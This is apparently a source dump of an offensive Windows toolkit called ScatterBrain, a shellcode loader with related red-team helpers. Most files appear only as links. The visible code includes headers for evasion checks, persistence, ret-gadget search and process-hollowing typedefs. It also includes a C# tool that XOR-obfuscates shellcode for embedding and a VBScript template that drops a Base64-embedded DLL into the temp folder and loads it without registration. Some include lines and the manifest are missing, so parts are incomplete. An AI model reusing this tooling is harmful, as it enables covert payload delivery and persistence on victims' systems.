├── DWELLS
├── DWELLS.h
├── stdafx.h
├── DWELLS.cpp
├── Resource.rc
├── dllmain.cpp
├── stdafx.cpp
├── targetver.h
├── resource.h
├── DWELLS.vcxproj.filters
└── DWELLS.vcxproj
├── ScatterBrain
├── CheckPlease.h
├── Yes
├── stdafx.h
├── ChatApplications.h
├── WindowsSecurity.h
├── dllmain.cpp
├── stdafx.cpp
├── targetver.h
├── scatterbrain.cpp
├── Persistence.h
├── Executables.h
├── CertificateTrust.h
├── Browsers.h
├── RegistryHelpers.h
├── Helpers.h
├── scatterbrain.h
├── WindowsSecurity.cpp
├── ChatApplications.cpp
├── ScatterBrain.vcxproj.filters
├── Browsers.cpp
├── RegistryHelpers.cpp
├── Executables.cpp
├── Persistence.cpp
├── Helpers.cpp
├── ScatterBrain.vcxproj
├── HijackStubs.h
└── HijackStubs.cpp
├── images
├── hxd_copy.png
├── hxd_open.png
├── ex_execution.png
├── safetychecks.png
├── walkthrough.png
└── scatterbrain_rawdata_paste.png
├── SharpWMI
├── SharpWMI
│ ├── app.config
│ ├── Properties
│ │ ├── AssemblyInfo.cs
│ │ ├── Resources.Designer.cs
│ │ └── Resources.resx
│ ├── SharpWMI.csproj
│ └── Program.cs
├── SharpWMI.sln
├── LICENSE
└── README.md
├── Cryptor
├── Properties
│ └── AssemblyInfo.cs
├── Program.cs
└── Cryptor.csproj
├── AccessibilityFeaturesPersistence
├── Properties
│ ├── AssemblyInfo.cs
│ ├── Resources.Designer.cs
│ └── Resources.resx
├── AccessibilityFeaturesPersistence.csproj
└── Program.cs
├── regfree_com_activation_templates
├── vbscript.vbs
├── jscript.js
└── wmi.ps1
├── .gitattributes
├── .gitignore
├── ScatterBrain.sln
└── README.md
/DWELLS/DWELLS.h:
--------------------------------------------------------------------------------
#pragma once

// Entry point declared by the DWELLS DLL project (it ships a dllmain.cpp);
// the implementation is in DWELLS.cpp, and nothing about its behaviour is
// visible from this header.
void Muntz();
--------------------------------------------------------------------------------
/DWELLS/stdafx.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/djhohnstein/ScatterBrain/HEAD/DWELLS/stdafx.h
--------------------------------------------------------------------------------
/ScatterBrain/CheckPlease.h:
--------------------------------------------------------------------------------
#pragma once
#include "stdafx.h"

// Pre-execution gate: presumably the payload only proceeds when this returns
// TRUE. Which environment checks it performs lives in the .cpp and is not
// visible here.
BOOL SafeToExecute();
--------------------------------------------------------------------------------
/ScatterBrain/Yes:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/djhohnstein/ScatterBrain/HEAD/ScatterBrain/Yes
--------------------------------------------------------------------------------
/DWELLS/DWELLS.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/djhohnstein/ScatterBrain/HEAD/DWELLS/DWELLS.cpp
--------------------------------------------------------------------------------
/DWELLS/Resource.rc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/djhohnstein/ScatterBrain/HEAD/DWELLS/Resource.rc
--------------------------------------------------------------------------------
/DWELLS/dllmain.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/djhohnstein/ScatterBrain/HEAD/DWELLS/dllmain.cpp
--------------------------------------------------------------------------------
/DWELLS/stdafx.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/djhohnstein/ScatterBrain/HEAD/DWELLS/stdafx.cpp
--------------------------------------------------------------------------------
/DWELLS/targetver.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/djhohnstein/ScatterBrain/HEAD/DWELLS/targetver.h
--------------------------------------------------------------------------------
/images/hxd_copy.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/djhohnstein/ScatterBrain/HEAD/images/hxd_copy.png
--------------------------------------------------------------------------------
/images/hxd_open.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/djhohnstein/ScatterBrain/HEAD/images/hxd_open.png
--------------------------------------------------------------------------------
/ScatterBrain/stdafx.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/djhohnstein/ScatterBrain/HEAD/ScatterBrain/stdafx.h
--------------------------------------------------------------------------------
/ScatterBrain/ChatApplications.h:
--------------------------------------------------------------------------------
#pragma once
#include "stdafx.h"

// Returns a path to an installed chat client (selection rules live in
// ChatApplications.cpp, not visible here). Raw wchar_t* — whether the caller
// owns/frees the buffer is not documented; confirm before storing the pointer.
wchar_t* GetChatApplication();
--------------------------------------------------------------------------------
/ScatterBrain/WindowsSecurity.h:
--------------------------------------------------------------------------------
#pragma once

#include "stdafx.h"

// True when the current process token's mandatory integrity label is High or
// above; false for Medium/Low and on any token-API failure (implemented in
// WindowsSecurity.cpp).
bool IsHighIntegrity();
--------------------------------------------------------------------------------
/ScatterBrain/dllmain.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/djhohnstein/ScatterBrain/HEAD/ScatterBrain/dllmain.cpp
--------------------------------------------------------------------------------
/ScatterBrain/stdafx.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/djhohnstein/ScatterBrain/HEAD/ScatterBrain/stdafx.cpp
--------------------------------------------------------------------------------
/ScatterBrain/targetver.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/djhohnstein/ScatterBrain/HEAD/ScatterBrain/targetver.h
--------------------------------------------------------------------------------
/images/ex_execution.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/djhohnstein/ScatterBrain/HEAD/images/ex_execution.png
--------------------------------------------------------------------------------
/images/safetychecks.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/djhohnstein/ScatterBrain/HEAD/images/safetychecks.png
--------------------------------------------------------------------------------
/images/walkthrough.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/djhohnstein/ScatterBrain/HEAD/images/walkthrough.png
--------------------------------------------------------------------------------
/ScatterBrain/scatterbrain.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/djhohnstein/ScatterBrain/HEAD/ScatterBrain/scatterbrain.cpp
--------------------------------------------------------------------------------
/ScatterBrain/Persistence.h:
--------------------------------------------------------------------------------
#pragma once
#include "stdafx.h"

// Whether this host is the one selected for persistence (criteria live in
// Persistence.cpp, not visible here).
bool IsHostPersistenceHost();
// Presumably installs the boot-time persistence mechanism. The misspelling
// ("Proceedure") is part of the public name — fixing it means updating callers.
void InitializeBootProceedure();
--------------------------------------------------------------------------------
/images/scatterbrain_rawdata_paste.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/djhohnstein/ScatterBrain/HEAD/images/scatterbrain_rawdata_paste.png
--------------------------------------------------------------------------------
/SharpWMI/SharpWMI/app.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/ScatterBrain/Executables.h:
--------------------------------------------------------------------------------
#pragma once

#include "stdafx.h"
#include
// NOTE(review): the header name on the line above was lost in extraction.

// Returns a path to an executable the code considers usable (the criteria live
// in Executables.cpp, not visible here). Raw wchar_t* — ownership/lifetime of
// the returned buffer is not documented; confirm whether the caller must free it.
wchar_t* GetValidExecutable();
// Judging by the signature: scans the named file/module (first arg) for `ret`
// gadgets, writing addresses into the caller's array (second arg) up to the
// capacity given in the third, and returns how many were found. Semantics
// inferred from the name only — verify against the .cpp.
int FindRetGadget(wchar_t*, void**, int);
--------------------------------------------------------------------------------
/ScatterBrain/CertificateTrust.h:
--------------------------------------------------------------------------------
#pragma once
#include "stdafx.h"

// Signature checks on a file path (first arg). The second argument is
// presumably a signer/subject name to match — compare against the .cpp.
BOOL HasValidSignature(PWCHAR, WCHAR*);
// Authenticode verification (presumably via WinVerifyTrust). NOTE(review): a
// valid Authenticode signature proves integrity and signer identity, not that
// the signer should be trusted for this purpose — callers should pin the
// expected publisher rather than accept any signed binary.
// NOTE(review): LPCTSTR changes meaning with UNICODE while the rest of this
// header is wide-only; PCWSTR would remove the ambiguity.
BOOL VerifyAuthenticodeSignature(PWCHAR, LPCTSTR);
//BOOL GetCertificateInformation(PWCHAR);
--------------------------------------------------------------------------------
/ScatterBrain/Browsers.h:
--------------------------------------------------------------------------------
#pragma once
#include "stdafx.h"
#include
// NOTE(review): the header name on the line above was lost in extraction.

// Locate installed browser executables. All return raw wchar_t* buffers whose
// ownership is not documented here — check Browsers.cpp before storing or
// freeing them.
wchar_t* GetGoogleChromePath();
wchar_t* GetGoogleChromeSxSPath();   // "Chrome SxS", i.e. the Canary channel
wchar_t* GetFireFoxPath();
// Presumably resolved through the registry (RegistryHelpers). A per-user
// default-browser setting lives under HKCU and can be changed by any code
// running as that user, so treat the result as an untrusted path.
wchar_t* GetDefaultBrowser();
--------------------------------------------------------------------------------
/ScatterBrain/RegistryHelpers.h:
--------------------------------------------------------------------------------
#pragma once
#include "stdafx.h"
#include
// NOTE(review): the header name on the line above was lost in extraction
// (<string> is required by the declarations below).

// Read a string value (second arg) from a key path (first arg) under the given
// hive. What is returned for a missing key/value is not visible here — check
// RegistryHelpers.cpp before treating "" as "absent".
std::wstring GetStringValueFromHKCU(const std::wstring&, const std::wstring&);
// HKCR is a merged view of HKLM\Software\Classes and HKCU\Software\Classes in
// which the per-user half wins on conflict, so a value read here may have been
// planted by any code running as the current user.
std::wstring GetStringValueFromHKCR(const std::wstring&, const std::wstring&);
std::wstring GetStringValueFromHKLM(const std::wstring&, const std::wstring&);
--------------------------------------------------------------------------------
/ScatterBrain/Helpers.h:
--------------------------------------------------------------------------------
#pragma once
#include "stdafx.h"
#include
// NOTE(review): the header name on the line above was lost in extraction
// (<string> is required by the declarations below).
// NOTE(review): `using namespace std;` in a header is imposed on every
// includer; prefer std::string / std::wstring in the prototypes.
using namespace std;

// Presumably maps a \\?\Volume{...} style path (first arg) to a drive-letter
// path written into the caller-supplied buffer (second arg). There is no
// length parameter, so the buffer-size contract lives entirely in Helpers.cpp
// — confirm callers size it adequately, otherwise this is an unbounded write.
void TranslateVolumeToPath(LPCWSTR, WCHAR*);
// Presumably: file exists and its PE header is 64-bit (narrow/wide overloads).
bool FileExistsAndIs64Bit(char*);
bool FileExistsAndIs64Bit(wchar_t*);
// Widens a narrow string. Returns a raw wchar_t*; whether the caller owns and
// must free the buffer is not visible here — check Helpers.cpp.
wchar_t* CharToWcharT(char*);
// Strip trailing whitespace in place.
void rtrimws(string&);
void rtrimws(wstring&);
//wchar_t* GetDefaultHandlerForExtension(LPCTSTR);
--------------------------------------------------------------------------------
/DWELLS/resource.h:
--------------------------------------------------------------------------------
1 | //{{NO_DEPENDENCIES}}
2 | // Microsoft Visual C++ generated include file.
3 | // Used by Resource.rc
4 | //
5 | #define IDR_DATA1 101
6 |
7 | // Next default values for new objects
8 | //
9 | #ifdef APSTUDIO_INVOKED
10 | #ifndef APSTUDIO_READONLY_SYMBOLS
11 | #define _APS_NEXT_RESOURCE_VALUE 102
12 | #define _APS_NEXT_COMMAND_VALUE 40001
13 | #define _APS_NEXT_CONTROL_VALUE 1001
14 | #define _APS_NEXT_SYMED_VALUE 101
15 | #endif
16 | #endif
17 |
--------------------------------------------------------------------------------
/SharpWMI/SharpWMI.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 14
4 | VisualStudioVersion = 14.0.25420.1
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SharpWMI", "SharpWMI\SharpWMI.csproj", "{6DD22880-DAC5-4B4D-9C91-8C35CC7B8180}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {6DD22880-DAC5-4B4D-9C91-8C35CC7B8180}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {6DD22880-DAC5-4B4D-9C91-8C35CC7B8180}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {6DD22880-DAC5-4B4D-9C91-8C35CC7B8180}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {6DD22880-DAC5-4B4D-9C91-8C35CC7B8180}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | EndGlobal
23 |
--------------------------------------------------------------------------------
/Cryptor/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("Cryptor")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("Cryptor")]
13 | [assembly: AssemblyCopyright("Copyright © 2019")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("d3cb84ff-065e-4f2b-8c35-e5ca0103eab5")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/SharpWMI/SharpWMI/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("SharpWMI")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("SharpWMI")]
13 | [assembly: AssemblyCopyright("Copyright © 2018")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("6dd22880-dac5-4b4d-9c91-8c35cc7b8180")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/SharpWMI/LICENSE:
--------------------------------------------------------------------------------
1 | SharpWMI is provided under the 3-clause BSD license below.
2 |
3 | *************************************************************
4 |
5 | Copyright (c) 2018, Will Schroeder
6 | All rights reserved.
7 |
8 | Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
9 |
10 | Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
11 | Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
12 | The names of its contributors may not be used to endorse or promote products derived from this software without specific prior written permission.
13 |
14 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
15 |
--------------------------------------------------------------------------------
/AccessibilityFeaturesPersistence/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("AccessibilityFeaturesPersistence")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("AccessibilityFeaturesPersistence")]
13 | [assembly: AssemblyCopyright("Copyright © 2019")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("558cf1e0-1983-4bf3-81ce-961058ace7c0")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/Cryptor/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 | using System.IO;
6 |
7 | namespace Cryptor
8 | {
class Program
{
    // XOR every byte of origBytes against the key in cryptor, cycling the key.
    //
    // NOTE(review): the wrap check `j == cryptor.Length - 1` runs before the
    // key byte is used, so the key's last element is never consumed. With the
    // 10-char key in Main the effective key is the 9 bytes "SecretKey" and the
    // trailing '\0' is dead. The decoder (the RawData.h consumer in
    // ScatterBrain, not visible here) must reproduce exactly this schedule or
    // it will mis-decode every 10th byte. Convert.ToByte(char) throws
    // OverflowException above U+00FF, so the key must stay within Latin-1.
    // NOTE(review): a short repeating XOR key is obfuscation, not encryption;
    // it offers no confidentiality to anyone holding the output, despite the
    // "encrypt" wording in the messages below.
    static byte[] XorByteArray(byte[] origBytes, char[] cryptor)
    {
        byte[] result = new byte[origBytes.Length];
        int j = 0;
        for (int i = 0; i < origBytes.Length; i++)
        {
            if (j == cryptor.Length - 1)
            {
                j = 0;
            }
            byte res = (byte)(origBytes[i] ^ Convert.ToByte(cryptor[j]));
            result[i] = res;
            j += 1;
        }
        return result;
    }

    // CLI entry point: expects exactly one argument, the path to a raw
    // shellcode blob. Exits with status 1 on a wrong argument count or a
    // missing file. Writes the XORed bytes to encrypted.bin in the current
    // working directory (File.WriteAllBytes overwrites silently).
    // NOTE(review): the key is hard-coded here and must match the decoder.
    static void Main(string[] args)
    {
        if (args.Length != 1)
        {
            Console.WriteLine("ERROR: Need to pass only the path to the shell code file to encrypt.");
            Environment.Exit(1);
        }
        if (!File.Exists(args[0]))
        {
            Console.WriteLine("Could not find path to shellcode bin file: {0}", args[0]);
            Environment.Exit(1);
        }
        byte[] shellcodeBytes = File.ReadAllBytes(args[0]);
        char[] cryptor = new char[] { 'S', 'e', 'c', 'r', 'e', 't', 'K', 'e', 'y', '\0' };
        byte[] encShellcodeBytes = XorByteArray(shellcodeBytes, cryptor);
        File.WriteAllBytes("encrypted.bin", encShellcodeBytes);
        Console.WriteLine("Wrote encoded binary to encrypted.bin. View it in HxD and copy to RawData.h of ScatterBrain.");
    }
}
47 | }
48 |
--------------------------------------------------------------------------------
/ScatterBrain/scatterbrain.h:
--------------------------------------------------------------------------------
#pragma once
#ifndef SCATTERBRAIN_H_
#define SCATTERBRAIN_H_
#include
#include
#include
#include
#include
// NOTE(review): the five header names above were lost in extraction. The
// declarations below need at least <windows.h>, <winternl.h> (NTSTATUS,
// PROCESSINFOCLASS) and <vector>.
// NOTE(review): `using namespace std;` in a header is imposed on every
// includer; the file already qualifies std::vector below, so it can go.
using namespace std;

// Entry points implemented in scatterbrain.cpp (not visible here).
int detonate();
int MonsterMind();


// Function-pointer type for NtQueryInformationProcess, presumably filled by a
// GetProcAddress lookup on ntdll (there is no import-library stub for it).
// https://msdn.microsoft.com/en-us/library/windows/desktop/ms684280(v=vs.85).aspx
typedef NTSTATUS(WINAPI* _NtQueryInformationProcess)(
	_In_ HANDLE ProcessHandle,
	_In_ PROCESSINFOCLASS ProcessInformationClass,
	_Out_ PVOID ProcessInformation,
	_In_ ULONG ProcessInformationLength,
	_Out_opt_ PULONG ReturnLength
	);

// Function-pointer type for ZwUnmapViewOfSection (ntdll); same resolution
// pattern as above.
// https://msdn.microsoft.com/en-us/library/windows/hardware/ff567119(v=vs.85).aspx
typedef NTSTATUS(WINAPI* _ZwUnmapViewOfSection)(
	_In_ HANDLE ProcessHandle,
	_In_opt_ PVOID BaseAddress
	);

// Header of one page's block in a PE .reloc directory; matches the layout of
// IMAGE_BASE_RELOCATION (VirtualAddress, SizeOfBlock).
typedef struct BASE_RELOCATION_BLOCK {
	DWORD PageAddress;   // RVA of the page the following entries apply to
	DWORD BlockSize;     // total bytes of this block, header included
} BASE_RELOCATION_BLOCK, *PBASE_RELOCATION_BLOCK;

// One 16-bit relocation entry: low 12 bits = offset within the page, high
// 4 bits = IMAGE_REL_BASED_* type.
typedef struct BASE_RELOCATION_ENTRY {
	USHORT Offset : 12;
	USHORT Type : 4;
} BASE_RELOCATION_ENTRY, *PBASE_RELOCATION_ENTRY;

// A 64-bit PE image split into its parts after parsing. The size_* members
// record how many bytes each part occupies (filled via set_sizes).
// NOTE(review): the vector element types were lost in extraction.
// NOTE(review): `inh32` holds IMAGE_NT_HEADERS64 despite the name.
struct PE_FILE
{
	size_t size_ids{};        // IMAGE_DOS_HEADER
	size_t size_dos_stub{};   // bytes between the DOS header and the NT headers
	size_t size_inh32{};      // IMAGE_NT_HEADERS64
	size_t size_ish{};        // all section headers
	size_t size_sections{};   // all raw section bodies
	IMAGE_DOS_HEADER ids;
	std::vector MS_DOS_STUB;
	IMAGE_NT_HEADERS64 inh32;
	std::vector ish;
	std::vector> Sections;
	void set_sizes(size_t, size_t, size_t, size_t, size_t);
};

// Minimal view of a mapped 64-bit image: NT headers plus the section table.
struct LOADED_IMAGE64
{
	PIMAGE_NT_HEADERS64 FileHeader;
	ULONG NumberOfSections;
	PIMAGE_SECTION_HEADER Sections;
};
#endif
--------------------------------------------------------------------------------
/ScatterBrain/WindowsSecurity.cpp:
--------------------------------------------------------------------------------
1 | #include "stdafx.h"
2 | #include
3 |
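// Returns true when the current process token carries a High (or higher)
// mandatory integrity label, false for Medium/Low and on any API failure.
// Prints the classification with wprintf, as before.
//
// Fix: the previous version returned from inside the nested branches, so on
// every successful path the token handle and the LocalAlloc'd
// TOKEN_MANDATORY_LABEL buffer were never released. The result is now stored
// and cleanup runs on every path. TOKEN_QUERY_SOURCE was dropped from the
// requested access — TokenIntegrityLevel needs only TOKEN_QUERY.
bool IsHighIntegrity()
{
	bool isHigh = false;

	HANDLE hToken = NULL;
	if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken))
	{
		return false;
	}

	// First call sizes the buffer; ERROR_INSUFFICIENT_BUFFER is the expected outcome.
	DWORD dwLengthNeeded = 0;
	if (!GetTokenInformation(hToken, TokenIntegrityLevel, NULL, 0, &dwLengthNeeded)
		&& GetLastError() == ERROR_INSUFFICIENT_BUFFER)
	{
		PTOKEN_MANDATORY_LABEL pTIL =
			(PTOKEN_MANDATORY_LABEL)LocalAlloc(LMEM_FIXED, dwLengthNeeded);
		if (pTIL != NULL)
		{
			if (GetTokenInformation(hToken, TokenIntegrityLevel, pTIL, dwLengthNeeded, &dwLengthNeeded))
			{
				// The integrity RID is the last sub-authority of the label SID.
				DWORD dwIntegrityLevel = *GetSidSubAuthority(pTIL->Label.Sid,
					(DWORD)(UCHAR)(*GetSidSubAuthorityCount(pTIL->Label.Sid) - 1));

				if (dwIntegrityLevel < SECURITY_MANDATORY_MEDIUM_RID)
				{
					wprintf(L"[*] Low Process\n");
				}
				else if (dwIntegrityLevel < SECURITY_MANDATORY_HIGH_RID)
				{
					wprintf(L"[*] Medium Process\n");
				}
				else
				{
					// High and everything above it (System etc.) land here.
					wprintf(L"[*] High Integrity Process\n");
					isHigh = true;
				}
			}
			LocalFree(pTIL);
		}
	}

	CloseHandle(hToken);
	return isHigh;
}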
--------------------------------------------------------------------------------
/DWELLS/DWELLS.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Header Files
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 | Header Files
29 |
30 |
31 |
32 |
33 | Source Files
34 |
35 |
36 | Source Files
37 |
38 |
39 | Source Files
40 |
41 |
42 |
43 |
44 | Resource Files
45 |
46 |
47 |
48 |
49 | Resource Files
50 |
51 |
52 |
--------------------------------------------------------------------------------
/regfree_com_activation_templates/vbscript.vbs:
--------------------------------------------------------------------------------
' Decode a Base64 string to raw bytes using an MSXML element whose DataType is
' "bin.base64": assigning the text and reading NodeTypedValue yields the byte
' array that writeBytes consumes below. No input validation is done here.
Function decodeBase64(base64)
    dim DM, EL
    Set DM = CreateObject("Microsoft.XMLDOM")
    ' Create temporary node with Base64 data type
    Set EL = DM.createElement("tmp")
    EL.DataType = "bin.base64"
    ' Set encoded String, get bytes
    EL.Text = base64
    decodeBase64 = EL.NodeTypedValue
End Function
11 |
' Build a pseudo-random string of strLen characters drawn from LETTERS.
' NOTE(review): `Int(UBound(LETTERS) * Rnd)` yields 0..UBound-1, so the final
' element ("9") is never selected; `Int((UBound(LETTERS) + 1) * Rnd)` would use
' the whole alphabet. Rnd/Randomize is not a cryptographic generator.
' NOTE(review): `min` and `max` are declared but unused; `i` and LETTERS are
' implicit globals (no Option Explicit in this script).
Function RandomString(ByVal strLen)
    Dim str, min, max

    LETTERS = Array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9")
    Randomize
    For i = 1 To strLen
        str = str & LETTERS(Int(UBound(LETTERS) * Rnd))
    Next
    RandomString = str
End Function
22 |
' Write a byte array to `file` via ADODB.Stream. The FSO TextStream constants
' are reused here: TypeBinary (1) happens to equal adTypeBinary, and ForWriting
' (2) happens to equal adSaveCreateOverWrite, so an existing file is replaced.
' NOTE(review): the stream is never closed.
Sub writeBytes(file, bytes)
    Dim binaryStream
    Const TypeBinary = 1
    Const ForReading = 1, ForWriting = 2, ForAppending = 8
    Set binaryStream = CreateObject("ADODB.Stream")
    binaryStream.Type = TypeBinary
    'Open the stream and write binary data
    binaryStream.Open
    binaryStream.Write bytes
    'Save binary data to disk
    binaryStream.SaveToFile file, ForWriting
End Sub
35 |
36 |
' --- Template body ---
' Drop a DLL carried inline as Base64 into the temp folder under a random name,
' then activate a COM class from it registration-free.
fileName = RandomString(12) + "." + RandomString(3)
classObj = RandomString(12)
' NOTE(review): the activation-context manifest XML (naming fileName and its
' comClass) was lost in extraction; a lone space is not a valid manifest, so
' the template as shown here is incomplete.
manifest = " "
Set SFSO = CreateObject("Scripting.FileSystemObject")
' GetSpecialFolder(2) = TemporaryFolder (the user's %TEMP%).
dropPath = SFSO.GetSpecialFolder(2)
' Placeholder for the Base64-encoded DLL bytes.
dynwrapX = "B64_DLL_BYTES_GO_HERE"


dynwrapXBytes = decodeBase64(dynwrapX)
finalPath = dropPath + "\" + fileName
' NOTE(review): nothing in this script removes finalPath afterwards.
writeBytes finalPath, dynwrapXBytes


' Microsoft.Windows.ActCtx accepts a manifest as text; CreateObject then
' instantiates the comClass it declares without any HKCR registration.
Set ax = CreateObject("Microsoft.Windows.ActCtx")
ax.ManifestText = manifest

Set DWX = ax.CreateObject(classObj)
54 |
--------------------------------------------------------------------------------
/SharpWMI/README.md:
--------------------------------------------------------------------------------
1 | # SharpWMI
2 |
3 | ----
4 |
